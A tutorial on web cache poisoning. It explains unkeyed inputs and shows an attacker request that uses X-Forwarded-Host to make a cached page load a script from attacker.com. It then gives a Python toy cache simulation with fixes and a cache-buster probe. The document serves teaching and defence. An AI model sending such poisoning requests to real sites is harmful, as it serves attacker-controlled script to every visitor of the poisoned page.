Web Cache Poisoning is an attack where an attacker manipulates cache behavior to store malicious responses that are then served to other users. This is achieved by injecting content through unkeyed inputs that affect the response but aren't part of the cache key.
Caches identify responses using a cache key (typically the host, path and query string, sometimes plus a few headers). Anything else in the request is unkeyed. If the application reflects an unkeyed input (such as a header that is not in the cache key) in a cacheable response, an attacker can poison the cache with malicious content that is then served to every user requesting the same resource until the entry expires or is purged.
1. Attacker identifies an unkeyed input that is reflected in the response
GET /page HTTP/1.1
Host: example.com
X-Forwarded-Host: attacker.com
2. Server generates the response using the attacker's input verbatim
<script src="https://attacker.com/malicious.js"></script>
3. Cache stores the poisoned response under the key for /page (X-Forwarded-Host is not part of the cache key)
4. Victim requests the same page, without the header
GET /page HTTP/1.1
Host: example.com
5. Cache serves the poisoned response containing the attacker's payload to the victim, and to everyone else, for the lifetime of the cache entry
Headers commonly worth testing as unkeyed inputs:
X-Forwarded-Host
X-Forwarded-Proto
X-Original-URL
X-Rewrite-URL
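The five steps above and the header list, as an added example that is not part of the original page: a toy shared cache whose key is method + path + query + Host, in front of an origin that reflects X-Forwarded-Host into a script URL. It shows the victim receiving the attacker's response, the two fixes (key the header, or stop reflecting it), and a cache-buster probe for checking whether a given header is reflected and unkeyed. All names, hostnames and the canary value are hypothetical.

```python
import secrets
from dataclasses import dataclass, field
from typing import Callable, Dict, Optional, Tuple
from urllib.parse import urlsplit

# (status, headers, body)
Response = Tuple[int, Dict[str, str], str]


@dataclass
class Request:
    method: str
    url: str                                   # path plus optional query, e.g. "/page?cb=1"
    headers: Dict[str, str] = field(default_factory=dict)

    def header(self, name: str, default: Optional[str] = None) -> Optional[str]:
        """Case-insensitive header lookup, as HTTP requires."""
        for k, v in self.headers.items():
            if k.lower() == name.lower():
                return v
        return default


def origin(req: Request) -> Response:
    """Vulnerable origin (hypothetical): builds an absolute script URL from X-Forwarded-Host."""
    host = req.header("X-Forwarded-Host") or req.header("Host", "example.com")
    body = f'<script src="https://{host}/static/app.js"></script>'
    return 200, {"Cache-Control": "public, max-age=300"}, body


def hardened_origin(req: Request) -> Response:
    """Fixed origin: never derives URLs from X-Forwarded-Host, uses a configured canonical host."""
    body = '<script src="https://example.com/static/app.js"></script>'
    return 200, {"Cache-Control": "public, max-age=300"}, body


class Cache:
    """Toy shared cache: key = method + path + query + the headers named in keyed_headers."""

    def __init__(self, backend: Callable[[Request], Response], keyed_headers=("Host",)):
        self.backend = backend
        self.keyed_headers = tuple(h.lower() for h in keyed_headers)
        self.store: Dict[tuple, Response] = {}

    def key(self, req: Request) -> tuple:
        parts = urlsplit(req.url)
        keyed = tuple(req.header(h, "") for h in self.keyed_headers)
        return (req.method, parts.path, parts.query, keyed)

    def fetch(self, req: Request) -> Tuple[str, Response]:
        k = self.key(req)
        if k in self.store:
            return "HIT", self.store[k]
        resp = self.backend(req)
        # Only successful, explicitly public GET responses are stored.
        if req.method == "GET" and resp[0] == 200 and "public" in resp[1].get("Cache-Control", ""):
            self.store[k] = resp
        return "MISS", resp


def poisoning_scenario(backend, keyed_headers=("Host",)) -> Tuple[str, str]:
    """Steps 1-5 from the text: attacker primes /page, then a clean victim request arrives."""
    cache = Cache(backend, keyed_headers)
    attacker = Request("GET", "/page", {"Host": "example.com", "X-Forwarded-Host": "attacker.com"})
    victim = Request("GET", "/page", {"Host": "example.com"})
    cache.fetch(attacker)                       # step 3: poisoned entry stored
    status, (_, _, body) = cache.fetch(victim)  # step 4/5: what the victim gets
    return status, body


def probe_unkeyed_reflection(cache: Cache, header: str, canary: str = "canary.invalid") -> Tuple[bool, bool]:
    """Check one header: (reflected in the response?, served from cache to a request lacking it?).
    A random cache-buster query parameter keeps the probe from poisoning the live /page entry."""
    url = "/page?cb=" + secrets.token_hex(4)
    _, (_, _, body1) = cache.fetch(Request("GET", url, {"Host": "example.com", header: canary}))
    reflected = canary in body1
    status, (_, _, body2) = cache.fetch(Request("GET", url, {"Host": "example.com"}))
    unkeyed = status == "HIT" and canary in body2
    return reflected, unkeyed


if __name__ == "__main__":
    print(poisoning_scenario(origin))
    print(poisoning_scenario(origin, keyed_headers=("Host", "X-Forwarded-Host")))
    print(poisoning_scenario(hardened_origin))
    for h in ("X-Forwarded-Host", "X-Forwarded-Proto", "X-Original-URL", "X-Rewrite-URL"):
        print(h, probe_unkeyed_reflection(Cache(origin), h))
```

The probe returns (True, True) only when a header is both reflected and unkeyed, which is the combination that makes poisoning possible; (True, False) means the cache keys on it, so a poisoned entry would only ever be served back to requests carrying the same value. Keep the cache-buster in every probe, since a single unbusted request that gets cached is itself a poisoning of the real page.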